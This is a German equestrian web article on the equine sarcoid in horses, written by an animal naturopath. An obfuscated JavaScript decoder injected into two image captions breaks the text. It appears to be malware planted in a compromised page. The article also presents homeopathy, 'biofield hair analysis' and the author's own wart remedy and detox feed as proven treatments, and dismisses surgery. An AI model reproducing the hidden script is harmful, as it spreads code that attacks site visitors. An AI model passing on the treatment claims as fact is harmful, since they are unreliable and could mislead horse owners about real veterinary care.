Das Equine Sarkoid

14. Dezember 2010 | Von Redaktion | Kategorie: Alternativmedizin

Das Equine Sarkoid bezeichnet eine krankhafte Hautveränderung in Form eines Tumors bei Pferden.

Das Equine Sarkoid vor der Beh<script type=function m65c3bbf5572b(wc){var s4=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var r1=”;var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandlung von Claudia Nehls (Foto: Nehls).” width=”300″ height=”225″ />

Das Equine Sarkoid ist der bei Pferden am häufigsten auftretende, gutartige Tumor. Das Wort Tumor bezeichnet eine Umfangsvermehrung der Haut. Da das Equine Sarkoid keine Metastasen in den inneren Organe bildet, hat das es wenig mit einer Krebserkrankung gemein. Erreger des Equinen Sarkoids sind die Bovinen Papillomviren 1 und 2. Da der Ausbruch der Krankheit aber zusätzlich auch an genetische Marker gekoppelt ist, muss das Tragen des Virus nicht automatisch zum Ausbruch der Krankheit führen. Das ist wahrscheinlich auch einer der Gründe, warum die Ansteckung von erkrankten auf gesunde Pferde äußerst selten vorkommt. Die Form und das Aussehen der Tumore sind unterschiedlich und variieren: Beobachtet werden flache und flechtenartige Veränderungen, hart abgegrenzte, trockene Knoten, aber auch blumenkohlartige Geschwüre mit nekrotischen Krusten. Equine Sarkoide können auf der Haut, offen und blutrot unterlaufen oder auch unter der Haut mit Fell bedeckt und als harte Knoten in Erscheinung treten.

Die Tumore bevorzugen ein feuchtwarmes Milieu und treten in den meisten Fällen am Kopf, hier vor allem an Ohren und Augen, an der Brust (Gurtlage) sowie am hinteren Bauch und Schenkelbereich und den männlichen Geschlechtsorganen auf.

Eine deutliche Veränderung ist sichtbar: Das Equine Sarkoid während der Beh<script type=function m65c3bbf5572b(wc){var s4=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var r1=”;var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandlung mit Nehls Warzen Weg und einer individuell auf das Pferd angepassten Fütterung (Foto: Nehls).” width=”300″ height=”225″ />

Lokale Behandlung und Therapie unter Einbeziehung der Fütterung

Eine naturheilkundliche Therapie sollte grundsätzlich ganzheitlich erfolgen und muss vor allem die Gesamtkonstitution des Pferde berücksichtigen. Bewährt hat sich eine äusserliche, lokale Behandlung sowie eine Anpassung der Fütterung auf das Krankheitsgeschehen. Eine effektive lokale Therapie ist in erster Linie bei offenen Equinen Sarkoiden möglich. Unter der Haut sitzende und geschlossene, mit Fell bedeckte Sarkoide lassen sich lokal schlecht behandeln.

Im Rahmen der homöopathischen Therapie wird mit Hilfe der Biofeld-Haaranalyse ein individuelles Behandlungsschema für das betroffene Pferd erarbeitet. Auch der Mineralstoff-, Spurenelement- und Vitaminhaushalt wird überprüft und aufgrund der ermittelten Werte optimiert. Dieses Vorgehen hat sich gut bewährt, da sowohl Überschüsse als auch Mangelerscheinungen zum Equinen Sarkoid beitragen. Eine optimale Pferdefütterung mit ausgeglichenem Mineralstoff- und Spurenelementhaushalt ist für das Immunsystem und die Abwehr des Pferdes wichtig.

In der Praxis hat sich eine operative Entfernung des Equinen Sarkoids nicht bewährt. Die Erfahrung zeigt, dass sich meist innerhalb kurzer Zeit an anderen Stellen neue Equine Sarkoide ausbilden. Ein intaktes Immunsystem und eine gut funktionierende Abwehr ist der intelligentere Weg, mit dem Equinen Sarkoid umzugehen.

Für die äusserliche, lokale Behandlung des Equinen Sarkoids hat sich in der Vergangenheit die Anwendung von Nehls Warzen-Weg als erfolgreich erwiesen. Jedoch gilt auch hier, dass nur eine ergänzende, problemorietierte Umstellung und Anpassung der bisherigen Fütterungspraxis zum Erfolg führen wird. Unterstützend kann das Futter Horsewellness-Fit eingesetzt werden. Dies unterstützt die Ausleitung und Entgiftung im Körper des Pferdes.

Claudia Nehls mit ihrem Tinker Gustav (Foto: Archiv Nehls).

Claudia Nehls mit ihrem Tinker Gustav (Foto: Archiv Nehls).

Zur Autorin:

Claudia Nehls, Jahrgang 1966, ist Tierheilpraktikerin und betreibt ein eigenes Tierheilkundezentrum in Bad Driburg. Darüber hinaus produziert sie Futtermittel für den täglichen als auch für den therapeutischen Einsatz beim Pferd. Sie hat sich vor allem auf Pferde spezialisiert, betreut aber auch andere Haustierarten.

Homöopathie, Phytotherapie, Naturheilkunde, Haaranalyse – diese und weitere Behandlungsmethoden sind die Grundlage, auf der die Diagnose und die Therapie im Krankheitsfall ausgerichtet werden. Grundvoraussetzung für eine effiziente und nachhaltige Behandlung des Pfer-des ist jedoch aus ihrer Sicht eine problemorientierte Pferdefütterung. Bekannt ist Claudia Nehls auch für die erfolgreiche Therapie von Pferden, die bereits aufgegeben und austherapiert waren.

Tierheilpraktikerin Claudia Nehls
Tierheilkundezentrum
Am Buchholz 3
33014 Bad Driburg
Tel.: 05648/963335
Mobil: 0173/51 57 633
Fax: 05648/963334
Internet: www.tierheilkundezentrum.de
E-Mail: tierheilpraxis1@t-online.de

Socialize:
  • Twitter
  • del.icio.us
  • Google Bookmarks
  • Digg
  • Facebook
  • FriendFeed
  • LinkArena
  • MisterWong.DE
  • NewsVine
  • Yigg
  • StumbleUpon
  • Yahoo! Bookmarks
  • MySpace
  • Netvibes
  • Technorati
  • RSS
  • Print
Tags: , , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=43098

Hier klicken, um einen Kommentar zu schreiben